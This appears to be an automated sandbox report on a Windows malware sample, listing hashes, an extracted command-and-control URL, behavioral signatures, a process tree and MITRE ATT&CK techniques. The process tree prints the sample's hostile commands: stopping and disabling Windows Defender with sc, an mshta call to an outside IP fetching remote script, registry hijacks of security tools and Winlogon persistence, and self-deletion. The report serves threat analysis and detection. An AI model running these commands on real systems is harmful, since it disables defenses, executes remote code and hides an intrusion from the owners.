Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240910-en -
resource tags
arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system -
submitted
21-09-2024 03:37
Static task
static1
Behavioral task
behavioral1
Sample
eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe
Resource
win10v2004-20240910-en
General
-
Target
eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe
-
Size
2.3MB
-
MD5
eeff0def88f30543c4b7f93976df37b4
-
SHA1
299b1944a074d04e1f3f23a05918eb2fd4542c4a
-
SHA256
1f59da5f8c3ed10ee6e27ca87592e3e81ab3cab6b7337ae40fae6a1e5887b243
-
SHA512
0335863a8d5c3cb968f67429fbc375943717c20393230da083a335f3d2540d8ec9434513f45113d504b7f389c982268628f91129c2db279b4e8ae1fd3ac43fa8
-
SSDEEP
49152:ukG9SpUleRvzfsEdDRUczjRO4Ye47YfW5I5GWMo/4abNpH1cZZ6k:uPSq6vzfJDRUczjfBGeF/4abNpVKZ6k
Malware Config
Extracted
http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=WLWOBVQV&2=i-s&3=99&4=9200&5=6&6=2&7=919041&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\xkgxhv.exe" xkgxhv.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 7 4244 mshta.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 20 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe xkgxhv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" xkgxhv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" xkgxhv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe xkgxhv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" xkgxhv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" xkgxhv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe xkgxhv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe xkgxhv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe xkgxhv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" xkgxhv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Control Panel\International\Geo\Nation eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe -
Executes dropped EXE 1 IoCs
pid Process 2036 xkgxhv.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 400 sc.exe 2668 sc.exe 2780 sc.exe 436 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xkgxhv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2036 xkgxhv.exe Token: SeShutdownPrivilege 2036 xkgxhv.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe 2036 xkgxhv.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2036 xkgxhv.exe 2036 xkgxhv.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 1640 wrote to memory of 400 1640 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 89 PID 1640 wrote to memory of 400 1640 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 89 PID 1640 wrote to memory of 400 1640 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 89 PID 1640 wrote to memory of 2668 1640 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 90 PID 1640 wrote to memory of 2668 1640 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 90 PID 1640 wrote to memory of 2668 1640 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 90 PID 1640 wrote to memory of 2036 1640 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 93 PID 1640 wrote to memory of 2036 1640 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 93 PID 1640 wrote to memory of 2036 1640 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 93 PID 1640 wrote to memory of 5012 1640 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 94 PID 1640 wrote to memory of 5012 1640 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 94 PID 1640 wrote to memory of 5012 1640 eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe 94 PID 2036 wrote to memory of 2780 2036 xkgxhv.exe 96 PID 2036 wrote to memory of 2780 2036 xkgxhv.exe 96 PID 2036 wrote to memory of 2780 2036 xkgxhv.exe 96 PID 2036 wrote to memory of 436 2036 xkgxhv.exe 97 PID 2036 wrote to memory of 436 2036 xkgxhv.exe 97 PID 2036 wrote to memory of 436 2036 xkgxhv.exe 97 PID 2036 wrote to memory of 4244 2036 xkgxhv.exe 100 PID 2036 wrote to memory of 4244 2036 xkgxhv.exe 100 PID 2036 wrote to memory of 4244 2036 xkgxhv.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\eeff0def88f30543c4b7f93976df37b4_JaffaCakes118.exe"1⤵
- Event Triggered Execution: Image File Execution Options Injection
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:400
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2668
-
-
C:\Users\Admin\AppData\Roaming\xkgxhv.exeC:\Users\Admin\AppData\Roaming\xkgxhv.exe2⤵
- Modifies WinLogon for persistence
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2780
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:436
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=WLWOBVQV&2=i-s&3=99&4=9200&5=6&6=2&7=919041&8=1033"3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:4244
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EEFF0D~1.EXE" >> NUL2⤵
- System Location Discovery: System Language Discovery
PID:5012
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Impair Defenses
1Indicator Removal
1File Deletion
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD5eeff0def88f30543c4b7f93976df37b4
SHA1299b1944a074d04e1f3f23a05918eb2fd4542c4a
SHA2561f59da5f8c3ed10ee6e27ca87592e3e81ab3cab6b7337ae40fae6a1e5887b243
SHA5120335863a8d5c3cb968f67429fbc375943717c20393230da083a335f3d2540d8ec9434513f45113d504b7f389c982268628f91129c2db279b4e8ae1fd3ac43fa8